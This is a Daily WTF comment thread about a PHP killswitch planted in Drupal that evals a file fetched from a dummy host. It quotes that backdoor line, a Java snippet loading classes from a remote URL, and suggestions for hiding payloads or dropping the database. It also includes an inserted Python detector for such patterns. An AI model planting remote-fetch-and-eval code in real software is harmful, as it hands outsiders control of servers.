• (cs)

    He was probably thinking "Maybe I needing later". Possibly the same guy, to boot.

    Also, fr1st!!!1111eleven

  • cheap shot (unregistered)

    He's not the frist to do something like that.

  • Anonymous Cow-Herd (unregistered)

    It's refreshing for a change to see a developer using Hungarian notation in his name but not his code.

  • Earlchaos (unregistered)

    OMG, that's not only really bad code, that's a backdoor. Loading code from remote server and "eval"uating it is worst practice ever...

    1st php-lesson: eval() is evil() 2nd php-lesson: Never use eval() etc...

    Captcha acsi

  • (cs)

    Markeiting + sholders = missing spell check.

  • Bobby Tables (unregistered)

    We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used. I really wanna smack the original developer. Not for the killswitch, not even for eval(), but for wrapping a variable declaration in a useless method call.

    CAPTCHA: uxor. Uber XOR. 1 UXOR 2 = 2

  • sehe (unregistered) in reply to Earlchaos
    Earlchaos:
    OMG, that's not only really bad code, that's a backdoor.

    uhoh someone is on to the clue

  • Fate (unregistered)

    I don't think much of the obfuscation of the guilty URL. (Select the text...)

  • FM (unregistered) in reply to Fate

    This is SOP for UK MOD redaction, I see nothing wrong with it.

  • Nagesh (unregistered)

    This can be done with URL clasloder in Java.

    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    
  • (cs)

    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be prevented in the first place...

  • Gary (unregistered)

    Isn't drupal just one big backdoor?

  • Nagesh (unregistered) in reply to Bobby Tables
    Bobby Tables:
    We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used.
    That's only as long as the control file keeps containing "1". Whoever is in control of the remote site that hosts it can change the content to something malicious at his leisure, as long as it also keeps evaluating as true (which AFAIK just means that it's neither empty nor a zero constant). That's a back door there big enough to drive a space shuttle crawler-transporter through.

  • Jupiter (unregistered) in reply to Fate
    Fate:
    I don't think much of the obfuscation of the guilty URL. (Select the text...)

    really? I found it very amusing...

  • (cs) in reply to steenbergh
    steenbergh:
    If there were programming licenses, most of this crap could be prevented in the first place...
    Ever heard of an incompetent doctor? Lawyer? Accountant? Plumber?

    All have licenses. Government issued paperwork does not guarantee competence.

  • Robert Remote Drop Tables (unregistered) in reply to Bobby Tables
    Bobby Tables:
    We all know that eval() is evil(), but in this code it's completely pointless. eval(1) returns 1, but this value is never used. I really wanna smack the original developer. Not for the killswitch, not even for eval(), but for wrapping a variable declaration in a useless method call.

    CAPTCHA: uxor. Uber XOR. 1 UXOR 2 = 2

    It gets better: thanks to the eval, this fraudulent individual could not even disable the website, he could just insert a line to kill the database:
    mysql_drop_db ("marketingCMS");

    Or he could just install a rootkit. Evil in any way.

  • (cs) in reply to steenbergh
    steenbergh:
    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be prevented in the first place...

    If you are going to have programming licenses, then you need to have programming police as well, who patrol your source code, and write you $175 tickets.

  • Stev (unregistered)

    Before anyone gets excited -

    lookup failed www.initrode-global.com Could not find an IP address for this domain name. Domain Whois record

    Queried whois.internic.net with "dom initrode-global.com"...

    No match for domain "INITRODE-GLOBAL.COM".

    Last update of whois database: Mon, 10 Oct 2011 13:55:05 UTC <<<

    Network Whois record

    Don't have an IP address for which to get a record DNS records

    DNS query for www.initrode-global.com returned an error from the server: NameError

    DNS query for initrode-global.com returned an error from the server: NameError

    No records to display Traceroute

    Don't have a destination IP address Service scan

    Don't have an IP address to scan for services

    I suspect that the domain name is fake and that the "obfuscation" used was a dig at the UK MOD.

  • (cs)

    TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that. It makes it much more difficult to realize, and is much funnier in the long term.

  • Nagesh (unregistered) in reply to Stev
    Stev:
    Before anyone gets excited -
    lookup failed www.initrode-global.com Could not find an IP address for this domain name.
    Initrode/initech/init*** is the standard dummy company name in TDWTF stories. That's the anonymization; the css-based blacking-out is just for the lulz -- apparently to see how many readers will fall for it this time and write indignant comments stating that the redaction was ineffective.

  • Michael Bolton (unregistered)

    Initrode is an Office Space reference

  • Nagesh (unregistered) in reply to dohpaz42
    dohpaz42:
    TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that.
    You can do that with logic on the external site that serves the control file. The only reason why it had such a blatant result in this case was that the production server could not get at the control file at all due to the firewall. Otherwise it could well have gone undetected that one out of 10,000 requests for rg_initrode.txt returned a malicious payload instead of the ordinary "1".

  • Not Me (unregistered)

    It used to be common practice to use eval to catch (and ignore) any errors. If file_get_contents failed for any reason (like that function being disabled) the code silently eats that fail. I suspect this code was written before PHP 5 introduced try / catch.

  • (cs) in reply to snoofle

    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

  • trtrwtf (unregistered)

    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?

  • (cs) in reply to Rootbeer
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

  • trtrwtf (unregistered) in reply to QJo
    QJo:
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.

  • JustAnother (unregistered)

    TRWTF is RGB(0,0,0)

    Like seriously, you can't just use the native: "#000"?

  • foo (unregistered) in reply to trtrwtf
    trtrwtf:
    QJo:
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.

    You suggest we should have talent shows for programmers on TV?

  • trtrwtf (unregistered) in reply to foo
    foo:
    trtrwtf:
    QJo:
    Rootbeer:
    Government-issued paperwork does not GUARANTEE competence, but it's a better indicator than most.

    I haven't heard of doctors congregating at a site called "Worse Than Flatlining" to make fun of their incompetent peers' folly, nor "Worse Than Disbarment" for lawyers or "Worse Than Standing Waist-Deep In Feces" for plumbers...

    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel

    "Worse Than February" for weathermen

    "Worse Than Farscape" for TV SF scriptwriters, or "Worse Than Friends" for their non-SF counterparts

    "Worse Than Furtrapping" for government registered animal rights liberationists

    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.

    You suggest we should have talent shows for programmers on TV?

    Worst idea ever. I love it.

  • foo (unregistered) in reply to dohpaz42
    dohpaz42:
    TRWTF is blatantly trying to kill the entire site using an external resource such as this. The better way to do it is to use some "random" logic to kill the site only part of the time. i.e., on Mondays, or every other half hour, or something as general as that. It makes it much more difficult to realize, and is much funnier in the long term.
    Except he wasn't in it for the lulz but for the money, i.e. extorting them.

    Sad thing is, he really had potential as an evil genius, disguising a full-blown backdoor as a simple killswitch that even half of the commenters here fell for, and then making such a simple mistake.

  • (cs) in reply to Nagesh
    Nagesh:
    That's only as long as the control file keeps containing "1". Whoever is in control of the remote site that hosts it can change the content to something malicious at his leisure, as long as it also keeps evaluating as true (which AFAIK just means that it's neither empty nor a zero constant). That's a back door there big enough to drive a space shuttle crawler-transporter through.

    This Nagesh is obviously a fake; note the correct English and grammar on all of its posts. The real Nagesh writes in Hinglish.

  • DGM (unregistered) in reply to foo
    foo:
    Sad thing is, he really had potential as an evil genius, disguising a full-blown backdoor as a simple killswitch that even half of the commenters here fell for, and then making such a simple mistake.

    Wasn't that hard to see. If your eval is followed by a URL ... red flags and loud klaxon alarms should be going off.

  • x00|\|3$!$ (unregistered) in reply to trtrwtf
    trtrwtf:
    QJo:
    "Worse Than Fish-smell" for a similar site for cleaning and deodorizing personnel
    Sound techs do refer to some singers as "worse than feedback", and they are not registered or licensed.
    I think "Worse Than Fish-smell" is where pimps go to gossip about burnt-out employees, and their only credential is the Whoremonger's Creed - which is not administered by a government agency.

  • Spudley (unregistered)

    1. The code hacked directly into the Drupal core; if the Drupal installation ever got updated (i.e. if a security patch was released), installing the update would have wiped out the hack. (and any other hacks lurking in the core)

    2. The eval() is completely arbitrary. The @ sign at the start of the code blocks any error reporting from that line, and there's no dynamic content in the eval().... really no idea why he used eval() for this at all. It would have worked exactly the same without it.

    3. It's not just the firewall that could have blocked this from working. PHP has a config setting that will prevent file_get_contents() from loading remote URLs. This setting is generally recommended to be enabled for security reasons, so the code given wouldn't work on a default PHP installation, regardless of the firewall setting.

    4. The "strangely out of place line" seems to be missing from the original post. I assume it's a function call that leads to the eval() line?

  • (cs) in reply to foo
    foo:
    You suggest we should have talent shows for programmers on TV?
    I would watch the stuffing out of that!

  • Doug (unregistered) in reply to Spudley
    Spudley:
    2. The eval() is completely arbitrary. The @ sign at the start of the code blocks any error reporting from that line, and there's no dynamic content in the eval().... really no idea why he used eval() for this at all. It would have worked exactly the same without it.

    Run this and see what happens.

    eval( $test = "echo 'wooooooo';" );

    The assignment statement is evaluated as an expression, which evaluates to the contents of the assignment.

  • Artemus Harper (unregistered) in reply to Nagesh
    Nagesh:
    This can be done with URL clasloder in Java.
    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    
    Close, you actually need to state the name of the class you want to load in loadClass(String) method.

    I know Runescape did (still doing?) something like this, except instead of using a URLClassLoader, they simply made their own and verified that the external code they were loading was of the correct size. This meant that if you put the Runescape applet and your own on the same web page you could trick it into loading different code instead and compromise someone's computer, if they had (previously) chosen to always trust Runescape applets, just by having them visit a web site. Can't do this anymore, because changing an Applet's stub requires a security permission if it isn't already set.

  • th (unregistered) in reply to trtrwtf
    trtrwtf:
    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?

    I thought the P in LAMP was Perl/Python/PHP, all depending on what flavor you wanted?

  • yername (unregistered) in reply to steenbergh
    steenbergh:
    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be prevented in the first place...

    Not most. Some. To get rid of most you'd need management licenses.

  • ChumbleSpuzz (unregistered) in reply to trtrwtf
    trtrwtf:
    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?

    Because that's what it stands for! "P" can stand for Perl, PHP, or Python; although, I mostly use it in reference to PHP.

  • Nagesh (unregistered) in reply to Artemus Harper
    Artemus Harper:
    Nagesh:
    This can be done with URL clasloder in Java.
    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    
    Close, you actually need to state the name of the class you want to load in loadClass(String) method.
    Thanking you very much for the correctings!!!

  • Gary (unregistered)

    Drupal has a couple of good core backdoors for this use case: probably the best is that users can create their own accounts in the default install. So instead of looking for a file on his own server, he could have looked for a user on the drupal instance with a distinct name.

    If user "fhqwhgads" exists, then do whatever...

  • Roman (unregistered) in reply to Gary
    Gary:
    Isn't drupal just one big backdoor?
    Yes, it is.

  • Roman (unregistered) in reply to trtrwtf
    trtrwtf:
    TRWTF is everyone knows LAMP is Linux, Apache, MySQL, Perl. Where does PHP come into it?
    What the heck is Perl?

  • Laszlo (unregistered) in reply to steenbergh
    steenbergh:
    If we'd revoke the programming license of people building such killswitches, the world would be a better place.

    Then again, if there were programming licenses, most of this crap could be legitimized in the first place...

    FTFY.

  • Risky (unregistered)

    He must have spent too much time working on the project and not enough time on the killswitch.

    Best have another (seemingly unsabotaged) application look for the internet kill-flag and just store it and then have the sabotaged app look that up in the unsabotaged system.

  • Sometimes a Cigar is a Cigar (unregistered)

    So when it's done on the web in PHP, we call it a malicious backdoor. Developers who use it are unethical.

    If it's done on the desktop, mobile platform, or video game console, we call it DRM and it's illegal (in the United States anyway) to circumvent. Developers cherish it, thinking it will stop piracy (HA!)

    What a messed up world...

  • Bob (unregistered)

    Why does everyone think this is a backdoor? Maybe it will be easier to see if it's formatted:

    eval( @$enabled = trim(file_get_contents("http://initrode-global.com/rg_initrode.txt")); if(!$enabled) exit; )

    For one thing, eval() expects a string argument--not PHP code--so this won't even run. And even if the code inside the eval() were run, it would not evaluate the contents of the remote file! It would just assign the contents to $enabled.
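
Whichever way the exact snippet parses, the fetch-then-eval combination the thread keeps arguing about is what a source-code reviewer should flag. The following is an added example, not code from the article or from any commenter: a small Python checker run over a constructed PHP fragment that contains the line as formatted above, reporting an eval() whose argument is built from a remote URL fetch, the @ error suppression on that line, and plain remote fetches that only work with allow_url_fopen=On.

```python
import re

# Constructed sample PHP file (not from the article): line 4 is the killswitch
# as quoted in the thread; the other lines show what must and must not be flagged.
SAMPLE_PHP = r'''<?php
// local config read: not a remote fetch, must stay quiet
$cfg = file_get_contents(__DIR__ . "/settings.json");
eval( @$enabled = trim(file_get_contents("http://initrode-global.com/rg_initrode.txt")); if(!$enabled) exit; );
$x = eval('return 1;');
$feed = file_get_contents("https://example.invalid/feed");
'''

EVAL_CALL = re.compile(r'\beval\s*\(')
# A fetch or include whose argument text carries a URL scheme; such calls only
# reach the network when allow_url_fopen (or allow_url_include) is On.
REMOTE_FETCH = re.compile(
    r'\b(file_get_contents|fopen|curl_init|include|require)(_once)?\b[^;]*?https?://', re.I)

def eval_argument(line):
    """Text inside the parentheses of the first eval( ... ) on the line, or None.
    Parentheses are balanced so trim(file_get_contents(...)) stays inside."""
    m = EVAL_CALL.search(line)
    if not m:
        return None
    start = m.end() - 1          # index of the opening parenthesis
    depth = 0
    for i in range(start, len(line)):
        if line[i] == '(':
            depth += 1
        elif line[i] == ')':
            depth -= 1
            if depth == 0:
                return line[start + 1:i]
    return line[start + 1:]      # unbalanced: take the rest of the line

def scan_php(source):
    """Return (line_no, severity, message) tuples for the risky patterns."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        arg = eval_argument(line)
        if arg is not None:
            if REMOTE_FETCH.search(arg):
                findings.append((line_no, "critical",
                                 "eval() argument comes from a remote URL fetch: "
                                 "whoever controls that URL controls the code that runs"))
            else:
                findings.append((line_no, "warning", "eval() present; review its input"))
            if arg.lstrip().startswith('@'):
                findings.append((line_no, "warning",
                                 "@ hides fetch failures, so a blocked URL fails silently"))
        elif REMOTE_FETCH.search(line):
            findings.append((line_no, "info",
                             "remote fetch; only works with allow_url_fopen=On"))
    return findings

if __name__ == "__main__":
    for line_no, severity, message in scan_php(SAMPLE_PHP):
        print(f"line {line_no}: [{severity}] {message}")
```

The local config read on line 3 stays quiet, which is the point of matching the URL scheme rather than the function name alone.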

  • Lest ye XSS (unregistered) in reply to Nagesh
    Nagesh:
    This can be done with URL clasloder in Java.
    try {
      URL url = new URL("http://www.synerzip.com/employees?empId=8847");
      Class resolve = URLClassloader.newInstance(url).loadClass(); 
    } catch (Throwable ex) {
      System.exit(0);
    }
    

    Java at least has SecurityManager classes. You can sandbox your JVM. For example, the Java SQL stored procedures do so.

Leave a comment on “The Jammed Killswitch”
